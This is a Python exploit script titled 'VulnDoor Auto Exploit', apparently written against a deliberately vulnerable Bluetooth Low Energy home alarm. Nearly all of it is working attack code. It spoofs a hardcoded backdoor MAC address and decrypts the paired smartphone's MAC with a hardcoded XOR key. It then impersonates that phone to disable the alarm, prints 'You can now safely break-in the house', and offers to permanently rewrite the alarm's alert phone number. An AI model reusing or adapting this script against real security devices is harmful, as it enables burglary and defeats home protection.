autoexploit.py

#! /usr/bin/env python3
#
# VulnDoor Auto Exploit
#

from argparse import ArgumentParser
from autoexploit import *
from autoexploit.ext_exec import do
from autoexploit.gatt import BleDeviceManager, TargetDevice, BleDeviceScanner
import sys, os, time
import re
import base64
import gatt
import threading

backdoor_mac = "DE:AD:BE:EF:00:00"
target_name = "VulnDoor"
bt_interface = "hci0"
crypt_key = "MySup3rK3y"

# ======================
#    Useful functions
# ======================

def usage():
    print("Usage:", sys.argv[0], " [-v <verb-level>]")
    print("  <verb-level> between", disp.Verb.ERROR, "and", disp.Verb.DEBUG)
    print("     ", disp.Verb.ERROR,   "= ERROR")
    print("     ", disp.Verb.WARNING, "= WARNING")
    print("     ", disp.Verb.INFO,    "= INFO")
    print("     ", disp.Verb.DEBUG,   "= DEBUG")
    sys.exit(0)


# ======================
#    Encryption/Decryption
# ======================

def apply_xor(text):
    output_char=[]
    i=0
    for input_char in text:
        input_char_int = ord(input_char)
        crypt_key_int = ord(crypt_key[i%len(crypt_key)])
        output_char.append(chr(input_char_int ^ crypt_key_int))
        i = i + 1
    return "".join(output_char)


def encrypt(plaintext):
    return base64.b64encode(apply_xor(plaintext).encode())


def decrypt(cyphertext):
    return apply_xor(base64.b64decode(cyphertext).decode("utf-8"))

# ======================
#    Reconnect until READY
# ======================

def wait_or_reconnect(target_device):
    first_time = True
    while not target_device.is_ready:
        if not first_time:
            disp.warn("Connected to device but did not receive \"READY\". Disconnecting and reconnecting...")
            target_device.disconnect()
            time.sleep(2)
            target_device.connect()
        else:
            first_time = False
        timetick = time.time()
        while not target_device.is_ready and time.time()<timetick+10:
            pass
# ==================
#    Main program
# ==================

if __name__ == "__main__":

    # Check root access
    if os.geteuid() != 0:
        disp.die("Please run this script as root!")


    # Parse arguments
    argc = len(sys.argv)

    try:
        if argc == 3 and sys.argv[1] == "-v":
            verb_lvl = int(sys.argv[2])
            if disp.Verb.ERROR <= verb_lvl <= disp.Verb.DEBUG:
                disp.Verb.curr = verb_lvl
            else:
                raise Exception
        else:
            raise Exception
    except:
        usage()


    # Display banner
    banner.show()

    disp.section_title("Searching for target")
    # Enable Bluetooth Device
    disp.info("Bringing interface up")
    do("hciconfig " + bt_interface + " up")
    do("service bluetooth restart")
    time.sleep(2)
    
    # Searching for BLE Device
    disp.info("Scanning for BLE Devices")
    device_mac = None
    scanner = BleDeviceScanner(adapter_name='hci0', device_name='VulnDoor')
    thread = threading.Thread(target = scanner.run)
    thread.start()
    scanner.start_discovery()


    try:
        while device_mac is None:
            device_mac = scanner.get_device_mac()
    except KeyboardInterrupt:
        scanner.quit()
        thread.join()
        disp.die("Keyboard Interrupt")
        
    scanner.quit()
    time.sleep(1)

    disp.section_title("Finding legitimate smartphone MAC")

    
    # Spoofing Support MAC
    disp.info("Spoofing Support MAC")
    do("bdaddr "+backdoor_mac.lower())
    do("hciconfig " + bt_interface + " reset")
    time.sleep(3)
    do("service bluetooth restart")
    time.sleep(2)
    do("hciconfig")
    disp.info("New MAC is " + backdoor_mac.upper())

    # Connect to device
    disp.info("Connecting to target")
    manager = BleDeviceManager(adapter_name='hci0')
    thread = threading.Thread(target = manager.run)
    thread.start()
    target_device = TargetDevice(manager=manager, mac_address = device_mac)
    target_device.connect()
    wait_or_reconnect(target_device)

    disp.info("Reading legitimate phone MAC saved in device")
    target_device.send(encrypt("r:mac"))
    while target_device.response is None:
        pass

    disp.info("Decrypting received data with hardcoded key")
    target_mac = decrypt(target_device.response)
    target_mac = ":".join([target_mac[i:i+2] for i in range(0, len(target_mac), 2)])
    disp.info("Saved MAC is {}".format(target_mac))

    disp.info("Disconnecting")
    target_device.disconnect()
    while target_device.is_connected():
        pass
    manager.quit()
    thread.join()

    time.sleep(1)

    disp.section_title("Disabling the alarm")

    # Spoofing Smartphone MAC
    disp.info("Spoofing legitimate phone MAC")
    do("bdaddr "+target_mac.lower())
    do("hciconfig " + bt_interface + " reset")
    disp.info("New MAC is " + target_mac.upper())
    time.sleep(3)
    do("service bluetooth restart")
    time.sleep(2)
    do("hciconfig")

    disp.info("Connecting to the alarm")
    manager = BleDeviceManager(adapter_name='hci0')
    thread = threading.Thread(target = manager.run)
    thread.start()
    manager.start_discovery()
    time.sleep(2)
    target_device = TargetDevice(manager=manager, mac_address = device_mac)
    target_device.connect()
    wait_or_reconnect(target_device)

    disp.info("Exploit successfull: Alarm is inhibited. You can now safely break-in the house.")
    
    disp.section_title("Persistence")
    disp.info("It is possible to make the alarm useless by modifying the recorded phone number.")
    
    cmd = input("Do you want to permanently disable the alarm? (y/N): ") 

    if cmd=="y":
        new_phone = input("Enter the new phone number (10 digits): ")
        target_device.send(encrypt("w:tel"+new_phone))
        disp.info("Sending encrypted configuration command")
        while target_device.response is None:
            pass
        disp.info("Permanent disable succeeded")
    else:
        disp.info("Stopping the attack")

    target_device.disconnect()
    while target_device.is_connected():
        pass

    manager.quit()
    thread.join()